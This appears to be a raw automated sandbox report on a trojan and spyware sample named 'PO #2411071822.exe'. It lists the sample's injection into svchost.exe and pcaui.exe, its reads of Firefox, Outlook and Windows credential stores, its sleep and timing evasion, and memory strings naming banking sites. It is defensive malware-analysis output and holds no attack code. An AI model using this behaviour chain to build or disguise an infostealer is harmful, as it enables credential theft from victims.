Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030470C0 2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F70E9 2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF0E0 2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF7B0 2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085630 2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F16CC 2_2_030F16CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7571 2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DD5B0 2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031095C3 2_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF43F 2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03031460 2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFB76 2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FB80 2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B5BF0 2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307DBF9 2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFA49 2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7A46 2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B3A6C 2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DDAAC 2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085AA0 2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E1AA3 2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EDAC6 2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D5910 2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049950 2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B950 2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AD800 2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030438E0 2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFF09 2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03041F92 2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFFB1 2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049EB0 2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03043D40 2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F1D5A 2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7D73 2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FDC0 2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B9C32 2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFCF2 2_2_030FFCF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: String function: 003FEC2F appears 68 times
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: String function: 00406AC0 appears 42 times
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: String function: 0040F8A0 appears 35 times
Source: PO #2411071822.exe, 00000000.00000003.2051244994.00000000037C3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO #2411071822.exe
Source: PO #2411071822.exe, 00000000.00000003.2051393797.000000000396D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO #2411071822.exe
Source: PO #2411071822.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@13/11
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042CE7A GetLastError,FormatMessageW,0_2_0042CE7A
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0041AB84 AdjustTokenPrivileges,CloseHandle,0_2_0041AB84
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0041B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0041B134
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0042E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0042E1FD
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_00426532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00426532
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_0043C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0043C18C
Source: C:\Users\user\Desktop\PO #2411071822.exe | Code function: 0_2_003E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_003E406B
Source: C:\Users\user\Desktop\PO #2411071822.exe | File created: C:\Users\user\AppData\Local\Temp\aut523D.tmp
Source: PO #2411071822.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\PO #2411071822.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: pcaui.exe, 00000004.00000003.2343695753.0000000003630000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2343794102.0000000003653000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.0000000003653000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.0000000003681000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2346293234.000000000365D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: PO #2411071822.exe | ReversingLabs: Detection: 36%
Source: unknown | Process created: C:\Users\user\Desktop\PO #2411071822.exe "C:\Users\user\Desktop\PO #2411071822.exe"
Source: C:\Users\user\Desktop\PO #2411071822.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO #2411071822.exe"
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Process created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
Source: C:\Windows\SysWOW64\pcaui.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\PO #2411071822.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: pcaui.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: dui70.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wer.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\pcaui.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\pcaui.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: PO #2411071822.exe | Static file information: File size 1213440 > 1048576
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: PO #2411071822.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: olMdMEBIcgVB.exe, 00000003.00000000.2076602169.000000000017E000.00000002.00000001.01000000.00000004.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3891157004.000000000017E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO #2411071822.exe, 00000000.00000003.2050855691.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, PO #2411071822.exe, 00000000.00000003.2053416861.0000000003890000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2152067887.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2152067887.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2061214547.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2056215589.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2163003937.000000000521B000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.00000000053D0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3892330024.000000000556E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.2161107067.0000000005067000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3892630131.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000006.00000002.3892138769.0000000002FEC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2452781737.00000000214CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.2120799220.0000000002A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120686195.0000000002A1A000.00000004.00000020.00020000.00000000.sdmp, olMdMEBIcgVB.exe, 00000003.00000002.3891627012.0000000001488000.00000004.00000020.00020000.00000000.sdmp
                Source: PO #2411071822.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: PO #2411071822.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: PO #2411071822.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: PO #2411071822.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: PO #2411071822.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_003FE01E LoadLibraryA,GetProcAddress, 0_2_003FE01E
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00406B05 push ecx; ret 0_2_00406B18
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02487257 push 00000020h; iretd 2_2_02487259
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02487260 pushad ; retf 2_2_0248726B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02487A64 push ecx; ret 2_2_02487A78
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0248EA38 push eax; retf 2_2_0248EA4B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024872D4 pushad ; retf 2_2_0248726B
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0248EA8D push esp; retf 2_2_0248EA8E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_024730C0 push eax; ret 2_2_024730C2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0247D0E4 push edx; retf 2_2_0247D0E5
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0247808C push esp; ret 2_2_02478097
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02486797 push ds; iretd 2_2_024867A2
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_030309AD push ecx; mov dword ptr [esp], ecx 2_2_030309B6
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0300135E push eax; iretd 2_2_03001369
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00448111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00448111
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_003FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_003FEB42
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_0040123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_0040123A
                Source: C:\Users\user\Desktop\PO #2411071822.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\pcaui.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\PO #2411071822.exe API/Special instruction interceptor: Address: D791F4
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\pcaui.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0307096E rdtsc 2_2_0307096E
                Source: C:\Users\user\Desktop\PO #2411071822.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes graph_0-94181
                Source: C:\Users\user\Desktop\PO #2411071822.exe API coverage: 4.1 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.6 %
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 2076 Thread sleep count: 48 > 30
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 2076 Thread sleep time: -96000s >= -30000s
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe TID: 1848 Thread sleep time: -55000s >= -30000s
                Source: C:\Program Files (x86)\EAwqKUXyqbSlIvYXYSRRAuOpzwQyvWAlhQrBFfHPvPvxPgulNESZ\olMdMEBIcgVB.exe TID: 1848 Thread sleep time: -40500s >= -30000s
                Source: C:\Windows\SysWOW64\pcaui.exe Last function: Thread delayed
                Source: C:\Windows\SysWOW64\pcaui.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00426CA9 GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00426CA9
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_004260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose, 0_2_004260DD
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_004263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose, 0_2_004263F9
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_0042EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0042EB60
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_0042F56F FindFirstFileW,FindClose, 0_2_0042F56F
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_0042F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0042F5FA
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00431B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431B2F
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00431C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00431C8A
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_00431F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_00431F94
                Source: C:\Users\user\Desktop\PO #2411071822.exe Code function: 0_2_003FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_003FDDC0
                Source: 72Z53078.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: 72Z53078.4.dr Binary or memory string: discord.comVMware20,11696428655f
                Source: 72Z53078.4.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: pcaui.exe, 00000004.00000002.3894074077.000000000875F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: rokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.dr Binary or memory string: global block list test formVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: olMdMEBIcgVB.exe, 00000006.00000002.3891744376.000000000100F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlle
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: 72Z53078.4.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: 72Z53078.4.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: 72Z53078.4.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: 72Z53078.4.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: pcaui.exe, 00000004.00000002.3891302705.00000000035DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: firefox.exe, 00000007.00000002.2454773761.000001B66134C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllII
                Source: 72Z53078.4.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: 72Z53078.4.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: 72Z53078.4.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: pcaui.exe, 00000004.00000002.3894074077.000000000875F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: smartscreen_malvertising_blocks_counterINTEGERrokers - EU WestVMware20,11696428655n
                Source: 72Z53078.4.dr Binary or memory string: AMC password management pageVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: 72Z53078.4.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: 72Z53078.4.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: 72Z53078.4.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
